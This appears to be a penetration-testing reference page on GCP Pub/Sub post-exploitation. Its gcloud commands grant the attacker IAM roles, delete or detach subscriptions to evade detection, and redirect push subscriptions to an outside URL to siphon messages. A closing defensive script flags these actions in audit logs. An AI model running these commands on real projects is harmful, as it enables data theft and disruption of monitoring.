GCP - Pub/Sub Post Exploitation

Pub/Sub

For more information about Pub/Sub, check the following page:

GCP - Pub/Sub Enum

pubsub.topics.publish

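Publish a message in a topic, useful to send unexpected data and trigger unexpected functionality or exploit vulnerabilities:

Publish message to topic

```bash
# Publish a message in a topic
gcloud pubsub topics publish <TOPIC_NAME> --message "Hello!"
```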

pubsub.topics.detachSubscription

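This can be used to stop a subscription from receiving messages, possibly to avoid detection.

Detach subscription from topic

```bash
gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
```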

pubsub.topics.delete

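This can be used to stop a subscription from receiving messages, possibly to evade detection.
A topic can be deleted even when subscriptions are attached to it.

Delete topic

```bash
gcloud pubsub topics delete <TOPIC_NAME>
```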

pubsub.topics.update

Use this permission to update some settings of the topic in order to disrupt it, such as `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`.

pubsub.topics.setIamPolicy

Give yourself the permissions needed to perform any of the previous attacks.

```bash
# Add Binding
gcloud pubsub topics add-iam-policy-binding <TOPIC_NAME> \
    --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
    --role="<ROLE_OR_CUSTOM_ROLE>" \
    --project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub topics remove-iam-policy-binding <TOPIC_NAME> \
    --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
    --role="<ROLE_OR_CUSTOM_ROLE>" \
    --project="<PROJECT_ID>"

# Change Policy
gcloud pubsub topics set-iam-policy <TOPIC_NAME> \
    <(echo '{
        "bindings": [
            {
                "role": "<ROLE_OR_CUSTOM_ROLE>",
                "members": [
                    "serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
                ]
            }
        ]
    }') \
    --project=<PROJECT_ID>
```

pubsub.subscriptions.create, pubsub.topics.attachSubscription, (pubsub.subscriptions.consume)

Get all the messages in a web server:

Create push subscription to receive messages

```bash
# Create a push subscription and receive all the messages instantly in your web server
gcloud pubsub subscriptions create <SUBSCRIPTION_NAME> --topic <TOPIC_NAME> --push-endpoint https://<URL_TO_PUSH_TO>
```

Create a subscription and use it to pull messages:

Create pull subscription and retrieve messages

```bash
# This will retrieve a non-ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <SUBSCRIPTION_NAME> --topic <TOPIC_NAME>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
# This command will wait for a message to be posted
```

pubsub.subscriptions.delete

Deleting a subscription could be useful to disrupt a log processing system or something similar:

Delete subscription

```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
```

pubsub.subscriptions.update

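Use this permission to update some settings so that messages are stored in a place you can access (URL, BigQuery table, bucket), or just to disrupt the subscription.

Update subscription endpoint

```bash
gcloud pubsub subscriptions update <SUBSCRIPTION_NAME> --push-endpoint <URL>
```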

pubsub.subscriptions.setIamPolicy

Give yourself the permissions needed to perform any of the previously mentioned attacks.

pubsub.schemas.attach, pubsub.topics.update, (pubsub.schemas.create)

Attach a schema to a topic so that messages do not fulfil it and the topic is therefore disrupted.
If there aren't any schemas, you might need to create one.

Create schema file and attach to topic

```json:schema.json
{
  "namespace": "com.example",
  "type": "record",
  "name": "Person",
  "fields": [
    { "name": "name", "type": "string" },
    { "name": "age", "type": "int" }
  ]
}
```

```bash
# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
    --schema=projects/<project-name>/schemas/<topic-id> \
    --message-encoding=json
```

pubsub.schemas.delete

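It might look like deleting a schema would let you send messages that do not fulfil the schema. However, as the schema will be deleted, no message will actually enter the topic. So this is useless:

Delete schema (useless)

```bash
gcloud pubsub schemas delete <SCHEMA_NAME>
```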

pubsub.schemas.setIamPolicy

Give yourself the permissions needed to perform any of the previously mentioned attacks.

pubsub.snapshots.create, pubsub.snapshots.seek

This will create a snapshot of all the unACKed messages and put them back into the subscription. Not very useful for an attacker, but here it is:

Create snapshot and seek to it

```bash
gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
    --subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
    --snapshot=YOUR_SNAPSHOT_NAME
```
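For defenders, the detach, delete, IAM and push-endpoint changes covered on this page are recorded in Cloud Audit Logs under `pubsub.googleapis.com`. The following triage sketch is an added example, not part of the original page: it flags those operations and any push endpoint outside an allowlist. The allowlist host, the sample entries and the presence of the `request` body in each entry are assumptions.

```python
from urllib.parse import urlparse
PUB, SUB = "google.pubsub.v1.Publisher.", "google.pubsub.v1.Subscriber."
# Audit-log methodName values for operations covered on this page.
DISRUPTIVE = {
    PUB + "DetachSubscription": "subscription detached",
    PUB + "DeleteTopic": "topic deleted",
    SUB + "DeleteSubscription": "subscription deleted",
    "google.iam.v1.IAMPolicy.SetIamPolicy": "IAM policy changed",
}
PUSH_METHODS = {SUB + "CreateSubscription", SUB + "UpdateSubscription"}
ALLOWED_PUSH_HOSTS = {"ingest.corp.example"}  # assumption: your own endpoints

def push_endpoint(request):
    # UpdateSubscription nests the new settings under "subscription".
    sub = request.get("subscription", request)
    return (sub.get("pushConfig") or {}).get("pushEndpoint", "")

def triage(entry):
    """Return (principal, resource, finding) for a suspicious entry, else None."""
    p = entry.get("protoPayload", {})
    if p.get("serviceName") != "pubsub.googleapis.com":
        return None
    method = p.get("methodName", "")
    who = p.get("authenticationInfo", {}).get("principalEmail", "unknown")
    res = p.get("resourceName", "")
    if method in DISRUPTIVE:
        return (who, res, DISRUPTIVE[method])
    if method in PUSH_METHODS:
        host = urlparse(push_endpoint(p.get("request", {}))).hostname
        if host and host not in ALLOWED_PUSH_HOSTS:
            return (who, res, f"push endpoint outside allowlist: {host}")
    return None

def findings(entries):
    return [f for f in map(triage, entries) if f]

def _entry(method, who, res, request=None):  # builds a constructed log entry
    return {"protoPayload": {"serviceName": "pubsub.googleapis.com",
            "methodName": method, "resourceName": res, "request": request or {},
            "authenticationInfo": {"principalEmail": who}}}
SA, P = "sa@demo.iam.gserviceaccount.com", "projects/demo/subscriptions/"
SAMPLE = [  # constructed entries, not real logs
    _entry(SUB + "CreateSubscription", "dev@corp.example", P + "worker"),
    _entry(SUB + "CreateSubscription", SA, P + "s2",
           {"pushConfig": {"pushEndpoint": "https://collector.example.net/hook"}}),
    _entry(SUB + "UpdateSubscription", SA, P + "logs", {"subscription":
           {"pushConfig": {"pushEndpoint": "https://ingest.corp.example/in"}}}),
    _entry(PUB + "DetachSubscription", SA, P + "logs"),
]
```

Running `findings(SAMPLE)` returns the push subscription pointing at `collector.example.net` and the detach event; the pull subscription and the update to an allowlisted host pass.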
